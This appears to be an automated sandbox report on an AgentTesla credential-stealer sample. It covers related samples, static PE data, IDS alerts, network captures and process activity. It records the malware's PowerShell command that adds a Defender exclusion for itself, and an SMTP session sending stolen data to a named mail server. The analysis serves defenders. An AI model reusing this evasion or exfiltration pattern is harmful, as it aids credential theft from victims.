                                      1460531MES_S Quote.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        QUOTE-4K148388-A-C334.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          PO# 81136575.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            PO_GM_list_30082024202003180817418300824.exeGet hashmaliciousAgentTeslaBrowse
                                              QUOTE-4K892388-A-C422.exeGet hashmaliciousAgentTeslaBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                mail.mbarieservicesltd.comPO23100070.exeGet hashmaliciousAgentTeslaBrowse
                                                • 199.79.62.115
                                                PO-000001488.exeGet hashmaliciousAgentTeslaBrowse
                                                • 199.79.62.115
                                                Quote 20240533-REV2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 199.79.62.115
                                                PO- 220135.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 199.79.62.115
                                                Quote_4400201477.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 199.79.62.115
                                                1460531MES_S Quote.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 199.79.62.115
                                                QUOTE-4K148388-A-C334.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 199.79.62.115
                                                PO# 81136575.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 199.79.62.115

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                PUBLIC-DOMAIN-REGISTRYUSshipping.exeGet hashmaliciousAgentTeslaBrowse
                                                • 207.174.215.249
                                                rInvoiceCM60916_xlx.exeGet hashmaliciousFormBookBrowse
                                                • 119.18.54.27
                                                Pending invoices.exeGet hashmaliciousFormBookBrowse
                                                • 119.18.54.27
                                                z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                                                • 119.18.54.27
                                                ENQUIRY NEED QUOTATION.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 208.91.199.225
                                                New order.exeGet hashmaliciousAgentTeslaBrowse
                                                • 207.174.215.249
                                                https://octo9.com.ng/Greula/Get hashmaliciousUnknownBrowse
                                                • 208.91.199.242
                                                https://hegekaka.za.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVZFNUpaM1U9JnVpZD1VU0VSMTYwOTIwMjRVMjMwOTE2MTk=N0123NGet hashmaliciousUnknownBrowse
                                                • 119.18.48.45
                                                Payment Advice - Advice Ref pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 208.91.199.224
                                                New order.exeGet hashmaliciousAgentTeslaBrowse
                                                • 207.174.215.249

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\order2024-10-07_174915.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\order2024-10-07_174915.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1216
                                                Entropy (8bit):5.34331486778365
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2232
                                                Entropy (8bit):5.379736180876081
                                                Encrypted:false
                                                SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YPUyus:tLHyIFKL3IZ2KRH9OugQs
                                                MD5:BC26E51192391D79FF5E4FB3860340BE
                                                SHA1:62F2D1E8869932FCA182C35E8B6E72A5CB302424
                                                SHA-256:A6595E121740E11B65911E8B843C9FF8AC4D20206D856FF6237FE4AAC6EDEDBA
                                                SHA-512:C4090BDB623716FBE0AB732643DCE474D6774F327CF39D7E932A56F07FB45BFFE3925CCA62ABD0266034AFFB5AFB3982D6FFDB595C0A63E31B3568D0410C670C
                                                Malicious:false
                                                Reputation:low
                                                Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2bsto2j.4xi.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dj4jfjyi.yis.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gtxryest.zrn.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqwlcwdx.z15.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.980259346464504
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:order2024-10-07_174915.exe
                                                File size:573'440 bytes
                                                MD5:4351cdd212b361f999d8bfad8fceceee
                                                SHA1:34dc372ecb6165c1016b502c93657db789d31203
                                                SHA256:963574e90ebf7786aaf6a17966441068baeadbce658ddd2f19af9a9f3f34c7cc
                                                SHA512:540d1001d9e9cd82dc2db8b85cb1d5068707706a82e7cd68486fee7920a78718f991a28514c09d1b7683be8f0f3884293d6dfd05aeb8b531683909a61a1368e8
                                                SSDEEP:12288:Rf0WyyKslE29kc/4FWLjzyd/wdqs7V3+vy7ox15GUB:Ry291gW/ETwVOvJlG
                                                TLSH:9EC4239126ADCE36F478AFBCC892670103B20B6B2896C76F5C135C6F6763B0C034569B
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0.................. ........@.. ....................... ............@................................

                                                File Icon

                                                Icon Hash:00928e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x48d502
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x67038D99 [Mon Oct 7 07:28:25 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x8d4ae0x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x8e0000x5a4.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x900000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x8beb40x54.text
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x8b5080x8b60068bcbeffd4846372e24f8b8ea970e8e7False0.9827056474215247data7.985572066441394IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0x8e0000x5a40x6000bfa7d1b0ebd753890333fcd5e3328ceFalse0.4205729166666667data4.070248079867378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x900000xc0x2008b0c8c27b31ba8165993d8aaba123640False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_VERSION0x8e0900x314data0.4365482233502538
                                                RT_MANIFEST0x8e3b40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-10-07T21:19:52.382003+02002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.749704199.79.62.115587TCP
                                                2024-10-07T21:19:52.382003+02002839723ETPRO MALWARE Win32/Agent Tesla SMTP Activity1192.168.2.749704199.79.62.115587TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 7, 2024 21:18:12.357938051 CEST49704587192.168.2.7199.79.62.115
                                                Oct 7, 2024 21:18:12.362929106 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:12.363182068 CEST49704587192.168.2.7199.79.62.115
                                                Oct 7, 2024 21:18:12.976272106 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:12.976994991 CEST49704587192.168.2.7199.79.62.115
                                                Oct 7, 2024 21:18:12.981901884 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:13.128717899 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:13.129606009 CEST49704587192.168.2.7199.79.62.115
                                                Oct 7, 2024 21:18:13.134418964 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:13.281490088 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:13.282254934 CEST49704587192.168.2.7199.79.62.115
                                                Oct 7, 2024 21:18:13.287332058 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:13.537381887 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:13.537606001 CEST49704587192.168.2.7199.79.62.115
                                                Oct 7, 2024 21:18:13.542467117 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:13.689497948 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:13.689704895 CEST49704587192.168.2.7199.79.62.115
                                                Oct 7, 2024 21:18:13.694699049 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:13.855420113 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:13.855617046 CEST49704587192.168.2.7199.79.62.115
                                                Oct 7, 2024 21:18:13.861037016 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:14.007858038 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:14.008486986 CEST49704587192.168.2.7199.79.62.115
                                                Oct 7, 2024 21:18:14.008584976 CEST49704587192.168.2.7199.79.62.115
                                                Oct 7, 2024 21:18:14.008584976 CEST49704587192.168.2.7199.79.62.115
                                                Oct 7, 2024 21:18:14.008584976 CEST49704587192.168.2.7199.79.62.115
                                                Oct 7, 2024 21:18:14.013581038 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:14.013612986 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:14.013746977 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:14.013775110 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:14.263580084 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:18:14.308605909 CEST49704587192.168.2.7199.79.62.115
                                                Oct 7, 2024 21:19:52.028470039 CEST49704587192.168.2.7199.79.62.115
                                                Oct 7, 2024 21:19:52.033704996 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:19:52.381457090 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:19:52.381863117 CEST58749704199.79.62.115192.168.2.7
                                                Oct 7, 2024 21:19:52.381937027 CEST49704587192.168.2.7199.79.62.115
                                                Oct 7, 2024 21:19:52.382003069 CEST49704587192.168.2.7199.79.62.115
                                                Oct 7, 2024 21:19:52.386806965 CEST58749704199.79.62.115192.168.2.7

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 7, 2024 21:18:12.018614054 CEST6146553192.168.2.71.1.1.1
                                                Oct 7, 2024 21:18:12.346399069 CEST53614651.1.1.1192.168.2.7
                                                Oct 7, 2024 21:18:39.410161018 CEST5361405162.159.36.2192.168.2.7
                                                Oct 7, 2024 21:18:39.913746119 CEST6143153192.168.2.71.1.1.1
                                                Oct 7, 2024 21:18:39.941715002 CEST53614311.1.1.1192.168.2.7

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Oct 7, 2024 21:18:12.018614054 CEST192.168.2.71.1.1.10x5e4cStandard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                                Oct 7, 2024 21:18:39.913746119 CEST192.168.2.71.1.1.10x29acStandard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Oct 7, 2024 21:18:12.346399069 CEST1.1.1.1192.168.2.70x5e4cNo error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                                Oct 7, 2024 21:18:39.941715002 CEST1.1.1.1192.168.2.70x29acName error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                SMTP Packets

                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                Oct 7, 2024 21:18:12.976272106 CEST58749704199.79.62.115192.168.2.7220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Tue, 08 Oct 2024 00:48:12 +0530
                                                220-We do not authorize the use of this system to transport unsolicited,
                                                220 and/or bulk e-mail.
                                                Oct 7, 2024 21:18:12.976994991 CEST49704587192.168.2.7199.79.62.115EHLO 745481
                                                Oct 7, 2024 21:18:13.128717899 CEST58749704199.79.62.115192.168.2.7250-md-54.webhostbox.net Hello 745481 [8.46.123.33]
                                                250-SIZE 52428800
                                                250-8BITMIME
                                                250-PIPELINING
                                                250-PIPECONNECT
                                                250-AUTH PLAIN LOGIN
                                                250-STARTTLS
                                                250 HELP
                                                Oct 7, 2024 21:18:13.129606009 CEST49704587192.168.2.7199.79.62.115AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                                                Oct 7, 2024 21:18:13.281490088 CEST58749704199.79.62.115192.168.2.7334 UGFzc3dvcmQ6
                                                Oct 7, 2024 21:18:13.537381887 CEST58749704199.79.62.115192.168.2.7235 Authentication succeeded
                                                Oct 7, 2024 21:18:13.537606001 CEST49704587192.168.2.7199.79.62.115MAIL FROM:<saless@mbarieservicesltd.com>
                                                Oct 7, 2024 21:18:13.689497948 CEST58749704199.79.62.115192.168.2.7250 OK
                                                Oct 7, 2024 21:18:13.689704895 CEST49704587192.168.2.7199.79.62.115RCPT TO:<iinfo@mbarieservicesltd.com>
                                                Oct 7, 2024 21:18:13.855420113 CEST58749704199.79.62.115192.168.2.7250 Accepted
                                                Oct 7, 2024 21:18:13.855617046 CEST49704587192.168.2.7199.79.62.115DATA
                                                Oct 7, 2024 21:18:14.007858038 CEST58749704199.79.62.115192.168.2.7354 Enter message, ending with "." on a line by itself
                                                Oct 7, 2024 21:18:14.008584976 CEST49704587192.168.2.7199.79.62.115.
                                                Oct 7, 2024 21:18:14.263580084 CEST58749704199.79.62.115192.168.2.7250 OK id=1sxtFF-0034jN-2z
                                                Oct 7, 2024 21:19:52.028470039 CEST49704587192.168.2.7199.79.62.115QUIT
                                                Oct 7, 2024 21:19:52.381457090 CEST58749704199.79.62.115192.168.2.7221 md-54.webhostbox.net closing connection

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:15:18:07
                                                Start date:07/10/2024
                                                Path:C:\Users\user\Desktop\order2024-10-07_174915.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\order2024-10-07_174915.exe"
                                                Imagebase:0xe60000
                                                File size:573'440 bytes
                                                MD5 hash:4351CDD212B361F999D8BFAD8FCECEEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1282489119.000000000450D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1282489119.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:15:18:09
                                                Start date:07/10/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe"
                                                Imagebase:0x4c0000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:15:18:09
                                                Start date:07/10/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:15:18:09
                                                Start date:07/10/2024
                                                Path:C:\Users\user\Desktop\order2024-10-07_174915.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\order2024-10-07_174915.exe"
                                                Imagebase:0x270000
                                                File size:573'440 bytes
                                                MD5 hash:4351CDD212B361F999D8BFAD8FCECEEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:8
                                                Start time:15:18:09
                                                Start date:07/10/2024
                                                Path:C:\Users\user\Desktop\order2024-10-07_174915.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\order2024-10-07_174915.exe"
                                                Imagebase:0xaf0000
                                                File size:573'440 bytes
                                                MD5 hash:4351CDD212B361F999D8BFAD8FCECEEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.2501932436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2504284574.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2504284574.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2504284574.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                General

                                                Target ID:11
                                                Start time:15:18:11
                                                Start date:07/10/2024
                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                Wow64 process (32bit):false
